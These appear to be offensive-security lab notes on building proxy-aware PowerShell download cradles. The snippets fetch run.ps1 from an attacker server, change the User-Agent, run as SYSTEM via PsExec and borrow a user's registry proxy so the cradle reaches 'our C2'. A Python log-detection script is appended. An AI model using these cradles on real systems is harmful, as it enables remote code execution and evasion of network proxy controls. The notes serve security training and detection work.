Verify proxy settings with GetProxy method

[System.Net.WebRequest]::DefaultWebProxy.GetProxy("http://192.168.45.195/run.ps1")

Remove proxy settings dynamically

$wc = new-object system.net.WebClient
$wc.proxy = $null
$wc.DownloadString("http://192.168.119.120/run.ps1")

Verify User-Agent Modification

# Determine if the Net.WebClient download cradle can modify the User-Agent property
$wc = new-object system.net.WebClient
$wc.Headers.Add('User-Agent', "This is my agent, there is no one like it...")
$wc.DownloadString("http://192.168.119.120/run.ps1")

HTTP Request with Custom User-Agent

# Running the code will download the file and leave behind the User-Agent text in the Apache access logs
kali@kali:~$ sudo tail /var/log/apache2/access.log
...
192.168.120.12 - - [09/Jun/2020:08:32:57 -0400] "GET /run.ps1 HTTP/1.1" 304 182 "-" "This is my agent, there is no one like it..."

Opening a 32-bit PowerShell ISE prompt as SYSTEM

C:\Tools\Sysinternals> PsExec.exe -s -i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe

Basic Net.WebClient download cradle

$wc = new-object system.net.WebClient
$wc.DownloadString("http://192.168.119.120/run.ps1")

HTTP request bypassing the proxy server

kali@kali:~$ sudo tail /var/log/apache2/access.log
...
192.168.120.11 - - [09/Jun/2020:08:22:36 -0400] "GET /run.ps1 HTTP/1.1" 200 4360 "-" "-"

If all communication must go through the proxy, this is a problem for us: a request that bypasses the proxy never leaves the network.

Finding a user hive based on SID

# Requires the HKU: drive to be mapped first (see the combined snippet below for New-PSDrive)
$keys = Get-ChildItem 'HKU:\'
# Domain/local user SIDs start with S-1-5-21-; substring(10) strips "HKEY_USERS" and keeps the leading backslash
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}

Fetching the proxy settings from registry key

# ProxyServer is stored per user, so it is read from the hive located above rather than from HKCU of the SYSTEM account
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer

Create and assign proxy object for the SYSTEM user

# Map HKEY_USERS as a PowerShell drive so the per-user hives can be enumerated
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:\'
# Locate the first loaded user hive (SID starting with S-1-5-21-) and keep its path relative to HKU:
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}
# Read that user's configured proxy and install it as the default proxy for this (SYSTEM) process
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr")
$wc = new-object system.net.WebClient
$wc.DownloadString("http://192.168.119.120/run2.ps1")

Apache access log entry after SYSTEM download cradle

kali@kali:~$ sudo tail /var/log/apache2/access.log
...
192.168.120.12 - - [09/Jun/2020:14:47:25 -0400] "GET /run2.ps1 HTTP/1.1" 304 182 "-" "-"
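The access-log excerpts above (the custom User-Agent entry and the two entries logged with a "-" User-Agent) show what a Net.WebClient cradle looks like from the web server's side. As an added detection example that is not part of these notes, the following Python parses Apache combined-format lines and flags script downloads made with an empty or non-browser User-Agent; the extension list and the benign fourth sample line are constructed, the other three samples are the entries from this page.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" log format, matching the access.log excerpts on this page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed list of extensions a download cradle typically fetches.
SCRIPT_EXTENSIONS = (".ps1", ".psm1", ".vbs", ".hta", ".bat", ".exe", ".dll")

def parse_line(line: str) -> Optional[Dict[str, str]]:
    # Return the fields of one combined-format line, or None if it does not parse.
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry: Dict[str, str]) -> Optional[str]:
    # Return a reason if the request looks like a script download cradle, else None.
    path = entry["path"].split("?", 1)[0].lower()
    if not path.endswith(SCRIPT_EXTENSIONS):
        return None
    ua = entry["ua"].strip()
    # Net.WebClient sends no User-Agent unless Headers.Add is used; Apache logs that as "-".
    if ua in ("", "-"):
        return "script fetched with empty User-Agent"
    # A hand-set User-Agent rarely looks like a real browser string.
    if not ua.startswith("Mozilla/"):
        return "script fetched with non-browser User-Agent: " + ua
    return None

def find_cradle_downloads(lines: List[str]) -> List[Dict[str, str]]:
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            hits.append({"ip": entry["ip"], "path": entry["path"], "reason": reason})
    return hits

# Constructed sample: the three entries from this page plus one benign browser request.
SAMPLE_LOG = [
    '192.168.120.11 - - [09/Jun/2020:08:22:36 -0400] "GET /run.ps1 HTTP/1.1" 200 4360 "-" "-"',
    '192.168.120.12 - - [09/Jun/2020:08:32:57 -0400] "GET /run.ps1 HTTP/1.1" 304 182 "-" "This is my agent, there is no one like it..."',
    '192.168.120.12 - - [09/Jun/2020:14:47:25 -0400] "GET /run2.ps1 HTTP/1.1" 304 182 "-" "-"',
    '10.0.0.5 - - [09/Jun/2020:15:01:02 -0400] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]

if __name__ == "__main__":
    for hit in find_cradle_downloads(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["path"]}: {hit["reason"]}')
```

Feed it `sudo tail /var/log/apache2/access.log` output on the server side to get the same three hits shown on this page while the browser request stays quiet.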

The HTTP request is routed through the proxy server and will allow our download cradle to call back to our C2 even when all traffic must go through the proxy.

Now our download cradle is versatile enough to handle communication through a proxy, even as SYSTEM.